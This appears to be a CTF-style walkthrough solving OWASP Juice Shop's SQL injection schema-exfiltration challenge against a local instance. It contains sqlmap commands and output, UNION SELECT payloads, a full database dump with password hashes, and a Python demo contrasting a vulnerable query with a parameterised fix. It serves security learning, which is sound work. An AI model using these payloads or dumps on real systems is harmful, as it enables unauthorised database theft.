Pwning OWASP’s Juice Shop Pt. 21: Database Schema

Challenge: 

Name: Database Schema

Description: Exfiltrate the entire DB schema definition via SQL injection.

Difficulty: 3 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp, FoxyProxy, sqlmap

Resources used:

Solutions Guide

SQLite Documentation

sqlmap Documentation

SQL Injection Payload Wordlist

OWASP SQL Injection Documentation

OWASP SQL Injection Bypassing WAF

Methodology: 

SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led to using sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.

As sqlmap has differing levels of intensity (its --level and --risk options control how many payloads it tries and how potentially harmful they are to the target system), and because I’m running the application locally in Docker, I decided there was no real point in being quiet. As such I set the program up to be exceedingly thorough in its search of that input field.

colby@kali:~$ sqlmap -u "http://localhost:3000/rest/products/search?q=" --dbs --risk 3
(sqlmap 1.4.9.12#dev, http://sqlmap.org)

I don’t care if it breaks, I just want to be certain.

sqlmap identified the following injection point(s) with a total of 176 HTTP(s) requests:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=') AND 3971=3971 AND ('CSPd' LIKE 'CSPd
---
[14:38:39] [INFO] testing SQLite
[14:38:39] [INFO] confirming SQLite
[14:38:39] [INFO] actively fingerprinting SQLite
[14:38:39] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[14:38:39] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')
[14:38:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 140 times
[14:38:39] [INFO] fetched data logged to text files under '/home/colby/.local/share/sqlmap/output/localhost'
[*] ending @ 14:38:39 /2020-11-02/

Injection vulnerability located!

What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.

colby@kali:~$ sqlmap -u "http://localhost:3000/rest/products/search?q=" --schema
(sqlmap 1.4.9.12#dev, http://sqlmap.org)

[14:40:50] [INFO] resuming back-end DBMS 'sqlite'
[14:40:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=') AND 3971=3971 AND ('CSPd' LIKE 'CSPd
---
[14:40:50] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[14:40:50] [INFO] enumerating database management system schema
[14:40:50] [INFO] fetching tables for database: 'SQLite_masterdb'
[14:40:50] [INFO] fetching number of tables for database 'SQLite_masterdb'
[14:40:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:40:50] [INFO] retrieved: 21
[INFO] retrieved: Users
[INFO] retrieved: sqlite_sequence
[INFO] retrieved: Products
[INFO] retrieved: Addresses
[INFO] retrieved: BasketItems
[INFO] retrieved: Baskets
[INFO] retrieved: Captchas
[INFO] retrieved: Cards
[INFO] retrieved: Challenges
[INFO] retrieved: Complaints
[INFO] retrieved: Deliveries
[INFO] retrieved: Feedbacks
[INFO] retrieved: ImageCaptchas
[INFO] retrieved: Memories
[INFO] retrieved: privacyRequests
[INFO] retrieved: purchaseQuantities
[INFO] retrieved: Quantities
[INFO] retrieved: Recycles
[INFO] retrieved: SecurityQuestions
[INFO] retrieved: SecurityAnswers
[INFO] retrieved: Wallets
[14:41:08] [INFO] fetched tables: 'SQLite_masterdb.SecurityQuestions', 'SQLite_m

But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.

Address-bar attempts, as captured in the browser history:

http://localhost:3000/rest/products/search?q=1 UNION SELECT sql FROM sqlite_master
http://localhost:3000/rest/products/search?q=12 UNION SELECT 1,2,3,4,... FROM sqlite_master (several variants padding the column list with numbered placeholders; partly unreadable in the screenshot)
http://localhost:3000/rest/products/search?q=12 UNION SELECT tbl_name FROM sqlite_master;
http://localhost:3000/rest/products/search?q=12 UNION SELECT 1 FROM sqlite_master
http://localhost:3000/rest/products/search?q=12 UNION SELECT sql FROM sqlite_master
http://localhost:3000/rest/products/search?q=1 UNION SELECT sql FROM sqlite_master WHERE type="table"

OK, a lot lost. After deciphering error after error, I worked out that what I actually had to match was the nine columns of the Products table the search query selects from, not the 21 tables sqlmap had found. Knowing I was close, however, didn’t make this easier. Ultimately I gave in and read the solution. My attempts had two problems. None of them closed the string literal and the parentheses the search term sits inside, so the UNION was being read as part of the LIKE pattern rather than as SQL; and a single ‘sql’ column can’t be UNIONed onto a nine-column SELECT. The solution’s payload fixes both: it opens with ‘’))’ to close the literal and both parentheses, pads the UNION out to nine columns with placeholder values alongside ‘sql FROM sqlite_master’, and ends with ‘--’ so the remainder of the original query is commented out. Horseshoes and hand grenades, I suppose.

Because I had already used sqlmap and knew it worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and the database contents specifically, the more easily I’ll be able to solve future challenges.

Hashes galore!

Prevention and mitigation strategies:

OWASP Mitigation Cheat Sheet

Use parameterised queries (prepared statements) so that user input is bound as data and never concatenated into the SQL text; input validation and allow-listing are a secondary layer, not a substitute.
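To tie together the UNION attempts above and the mitigation, here is an added example of my own (not code from the post or from Juice Shop). It models the shape of the search endpoint’s WHERE clause in an in-memory SQLite database and runs three payloads through it: the address-bar style attempt that never leaves the LIKE literal, a breakout with the wrong column count, and the nine-column payload that pulls sqlite_master.sql, then runs the same payload against a parameterised version of the query. The two-table schema, sample rows, payload constants and function names are all constructed for the demo; Products is given nine columns so the column-count mismatch is reproduced faithfully.

```python
"""Added example (mine, not from the post or from Juice Shop): a small SQLite
model of the vulnerable search endpoint, showing why the address-bar attempts
returned nothing, why a one-column UNION errors out, what the working
schema-exfiltration payload looks like, and the parameterised fix.

Constructed for this demo (assumptions): the two-table schema, the sample
rows, the payload constants and all function names. Only the WHERE clause
shape is modelled on the search query the challenge targets.
"""
import sqlite3

# Products gets nine columns so the UNION column-count mismatch from the
# write-up is reproduced; Users stands in for the tables worth stealing.
SCHEMA = """
CREATE TABLE Products (
    id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(255),
    description VARCHAR(255), price DECIMAL(10,2), deluxePrice DECIMAL(10,2),
    image VARCHAR(255), createdAt DATETIME, updatedAt DATETIME, deletedAt DATETIME
);
CREATE TABLE Users (
    id INTEGER PRIMARY KEY AUTOINCREMENT, email VARCHAR(255), password VARCHAR(255)
);
INSERT INTO Products (name, description, price) VALUES ('Apple Juice', 'Fresh', 1.99);
INSERT INTO Products (name, description, price) VALUES ('Banana Juice', 'Yellow', 2.99);
"""

# Constructed payloads for the three situations discussed in the post.
NO_BREAKOUT = "1 UNION SELECT sql FROM sqlite_master"          # never leaves the LIKE literal
WRONG_COLUMNS = "')) UNION SELECT sql FROM sqlite_master--"    # breaks out, 1 column vs 9
WORKING = "')) UNION SELECT sql,'2','3','4','5','6','7','8','9' FROM sqlite_master--"


def connect():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_search(conn, q):
    """Vulnerable: q is spliced straight into the SQL text."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE '%" + q + "%' OR description LIKE '%"
           + q + "%') AND deletedAt IS NULL) ORDER BY name")
    return conn.execute(sql).fetchall()


def safe_search(conn, q):
    """Fixed: the same query with q bound as a parameter, so it is only ever data."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    pattern = "%" + q + "%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


def leaked_schema(rows):
    """CREATE statements that the UNION smuggled into the first (id) column."""
    return sorted(r[0] for r in rows if isinstance(r[0], str) and r[0].startswith("CREATE"))


def classify(conn, q, search=vulnerable_search):
    """Describe what a payload achieves against the given search function."""
    try:
        rows = search(conn, q)
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)
    leak = leaked_schema(rows)
    if leak:
        return "leaked %d schema rows" % len(leak)
    return "no leak, %d row(s)" % len(rows)


if __name__ == "__main__":
    db = connect()
    for label, payload in (("no breakout", NO_BREAKOUT),
                           ("wrong column count", WRONG_COLUMNS),
                           ("working payload", WORKING)):
        print("%-19s -> %s" % (label, classify(db, payload)))
    print("parameterised      -> %s" % classify(db, WORKING, safe_search))
    for stmt in leaked_schema(vulnerable_search(db, WORKING)):
        print("   ", stmt.split("\n")[0])
```

Running it shows the first payload behaving as an ordinary (unmatched) search term, the second failing with SQLite’s "SELECTs to the left and right of UNION do not have the same number of result columns", and the third returning the CREATE statements for every table, including sqlite_sequence, which is why sqlmap counted 21 entries rather than 20 application tables. The parameterised version returns nothing for the same payload because the quote and parentheses are just characters inside a LIKE pattern.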

Lessons Learned and Things Worth Mentioning: 

  1. When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.
